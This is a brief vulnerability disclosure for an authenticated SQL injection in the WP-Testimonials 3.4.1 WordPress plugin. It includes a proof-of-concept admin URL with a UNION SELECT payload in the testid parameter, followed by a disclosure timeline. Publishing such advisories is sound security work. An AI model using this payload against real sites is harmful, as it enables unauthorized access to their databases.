Identification Date: 02/06/2017
Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/
Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/
SQL injection vulnerability in WordPress WP-Testimonials Version 3.4.1 allows to an authenticated user to execute arbitrary SQL commands via the testid parameter.
Proof of Concept
A Proof of Concept code is provided below.
http://[wordpress_site]/wp-admin/admin.php?page=sfstst_manage&mode=sfststedit&testid=-1 UNION ALL SELECT NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL-- comment
The results of the SQL injection are being reflected in the Client’s Name input field.
- 02/06/2017 – Identification of the Vulnerability
- 02/06/2017 – Attempt to speak with the developer
- 02/06/2017 – Request for CVE
- 06/06/2017 – Contact with WordPress
- 07/06/2017 – The plug-in was removed from WordPress